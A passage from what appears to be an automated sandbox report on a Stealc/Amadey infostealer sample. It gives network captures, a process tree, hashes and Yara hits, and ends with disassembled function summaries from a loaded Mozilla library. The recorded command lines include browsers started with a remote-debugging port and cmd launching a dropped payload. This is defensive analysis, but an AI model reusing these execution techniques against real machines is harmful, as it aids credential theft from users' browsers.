<RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.6	49886	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:15 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:15 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:15 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 061d09a2-c01e-00a1-3006-487e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095215Z-r1cf579d778xr2r4hC1EWRqvfs00000001z0000000003vd9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:15 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.6	49887	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:15 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:15 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:15 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: b9413899-901e-0015-7203-48b284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095215Z-r1cf579d778qgtz2hC1EWRmgks00000001w0000000001gmp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:15 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Target ID:	0
Start time:	04:51:07
Start date:	07/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x520000
File size:	5'146'112 bytes
MD5 hash:	443C778FC72C59824A828ECE66B8E82A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2720322383.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:51:17
Start date:	07/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:51:18
Start date:	07/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2172,i,17693592951107771680,17343620240284749049,262144 /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:51:29
Start date:	07/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:51:30
Start date:	07/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2084,i,17208139425512055275,10975637639687312567,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:51:30
Start date:	07/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:51:30
Start date:	07/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2060,i,12344348702254346742,4398189957191153386,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:52:05
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DGCAAFBFBK.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:52:05
Start date:	07/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:52:05
Start date:	07/12/2024
Path:	C:\Users\user\Documents\DGCAAFBFBK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\DGCAAFBFBK.exe"
Imagebase:	0x7d0000
File size:	3'261'440 bytes
MD5 hash:	C0D113D521F4055CE2D25BA430F7789D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.2758050917.00000000007D1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:52:08
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xb00000
File size:	3'261'440 bytes
MD5 hash:	C0D113D521F4055CE2D25BA430F7789D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.2798800091.0000000000B01000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	04:53:00
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xb00000
File size:	3'261'440 bytes
MD5 hash:	C0D113D521F4055CE2D25BA430F7789D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.3387296289.0000000000B01000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	04:53:11
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe"
Imagebase:	0x9c0000
File size:	503'040 bytes
MD5 hash:	0141BAF82BB318D465D2207BE71876EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 18%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30.6%
Total number of Nodes:	108
Total number of Limit Nodes:	12

Executed Functions

Function 6C9535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DF688,00001000), ref: 6C9535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C9535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C95363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C95369F
__aulldiv.LIBCMT ref: 6C9536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C953773
EnterCriticalSection.KERNEL32(6C9DF688), ref: 6C95377E
LeaveCriticalSection.KERNEL32(6C9DF688), ref: 6C9537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C9537C4
EnterCriticalSection.KERNEL32(6C9DF688), ref: 6C9537CB
LeaveCriticalSection.KERNEL32(6C9DF688), ref: 6C953801
__aulldiv.LIBCMT ref: 6C953883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C953902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C953918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C95394C

Strings

AuthcAMDenti, xrefs: 6C953946
QPC, xrefs: 6C9538FC
GenuntelineI, xrefs: 6C953639
GTC, xrefs: 6C953912
MOZ_TIMESTAMP_MODE, xrefs: 6C9535DB

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 26ed5ced44c9aa1577918de3aab6bbf7f2504a1cc1f72e926ebf17c93282d5c4
Instruction ID: 658b735bf762aebd1eb55ad421c753acc8d8f3b2ac1c6ad5fe1dc3088615d149
Opcode Fuzzy Hash: 26ed5ced44c9aa1577918de3aab6bbf7f2504a1cc1f72e926ebf17c93282d5c4
Instruction Fuzzy Hash: 4BB193B1B09B009BDB08DF38C85561ABBF5FB8A704F55892DF599E3B90D730E9408B91

Function 6C96C930 Relevance: 7.6, APIs: 5, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 6C96C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C96C969
GetSystemInfo.KERNEL32(?), ref: 6C96C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C96C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C96C9E2

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 066f3a386cdd80a083f4653106413906abd9f3794fdbb4dcfb1baa6ee936c6b2
Instruction ID: 9ee9738c2a8a6c4f9e6c533108214e4a777461f5b42f59fcf86c94ad6a6c57a6
Opcode Fuzzy Hash: 066f3a386cdd80a083f4653106413906abd9f3794fdbb4dcfb1baa6ee936c6b2
Instruction Fuzzy Hash: 9721C832745A146BEB04AA69DC84BAE7279AB46744F60051AF903B7E80DB60E940C7A1

Function 6C953060 Relevance: 4.5, APIs: 3, Instructions: 36
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C953095

Part of subcall function 6C9535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DF688,00001000), ref: 6C9535D5
Part of subcall function 6C9535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9535E0
Part of subcall function 6C9535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C9535FD
Part of subcall function 6C9535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C95363F
Part of subcall function 6C9535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C95369F
Part of subcall function 6C9535A0: __aulldiv.LIBCMT ref: 6C9536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C95309F

Part of subcall function 6C975B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9756EE,?,00000001), ref: 6C975B85
Part of subcall function 6C975B50: EnterCriticalSection.KERNEL32(6C9DF688,?,?,?,6C9756EE,?,00000001), ref: 6C975B90
Part of subcall function 6C975B50: LeaveCriticalSection.KERNEL32(6C9DF688,?,?,?,6C9756EE,?,00000001), ref: 6C975BD8
Part of subcall function 6C975B50: GetTickCount64.KERNEL32 ref: 6C975BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C9530BE

Part of subcall function 6C9530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C953127
Part of subcall function 6C9530F0: __aulldiv.LIBCMT ref: 6C953140

Part of subcall function 6C98AB2A: __onexit.LIBCMT ref: 6C98AB30

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 0088ff590e51e29d5d98fc0f73c348403daa0d9f64a6dcb850a30aa6584e80aa
Instruction ID: b3aebd78f234a2a2590a36ff075f2eaf2ac2b283d8202f17e2f694980101aa9a
Opcode Fuzzy Hash: 0088ff590e51e29d5d98fc0f73c348403daa0d9f64a6dcb850a30aa6584e80aa
Instruction Fuzzy Hash: E8F0A962D29F4C96CB10DF7498421E6B374AF7B118FA4571AF84477A61FB20B1D88391

Non-executed Functions

Function 6C965440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587
threadtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C965492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9654A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9654BE
__Init_thread_footer.LIBCMT ref: 6C9654DB

Part of subcall function 6C98AB3F: EnterCriticalSection.KERNEL32(6C9DE370,?,?,6C953527,6C9DF6CC,?,?,?,?,?,?,?,?,6C953284), ref: 6C98AB49
Part of subcall function 6C98AB3F: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C953527,6C9DF6CC,?,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98AB7C

Part of subcall function 6C98CBE8: GetCurrentProcess.KERNEL32(?,6C9531A7), ref: 6C98CBF1
Part of subcall function 6C98CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9531A7), ref: 6C98CBFA

GetCurrentThreadId.KERNEL32 ref: 6C9654F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C965516
GetCurrentThreadId.KERNEL32 ref: 6C96556A
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C965577
moz_xmalloc.MOZGLUE(00000070), ref: 6C965585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C965590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C9655E6
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C965606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C965616

Part of subcall function 6C98AB89: EnterCriticalSection.KERNEL32(6C9DE370,?,?,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284), ref: 6C98AB94
Part of subcall function 6C98AB89: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98ABD1

GetCurrentThreadId.KERNEL32 ref: 6C96563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C965646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C96567C
free.MOZGLUE(?), ref: 6C9656AE

Part of subcall function 6C975E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C975EDB
Part of subcall function 6C975E90: memset.VCRUNTIME140(6C9B7765,000000E5,55CCCCCC), ref: 6C975F27
Part of subcall function 6C975E90: LeaveCriticalSection.KERNEL32(?), ref: 6C975FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C9656E8
GetCurrentThreadId.KERNEL32 ref: 6C965707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C96570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C965729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C96574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C96576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C965796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C9657B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C9657CA

Strings

[I %d/%d] profiler_init, xrefs: 6C96564E
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C965766
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C965724
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C965D01
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C9656E3
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C965D2B
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C965C56
MOZ_PROFILER_STARTUP, xrefs: 6C9655E1
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C965AC9
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C9657AE
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9654B9
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C965B38
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C96584E
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C965BBE
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C9657C5
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C965749
MOZ_BASE_PROFILER_HELP, xrefs: 6C965511
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C965D24
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C965D1C
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C965717
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C96548D
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C965791
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9654A3
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C965CF9
GeckoMain, xrefs: 6C965554, 6C9655D5

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - 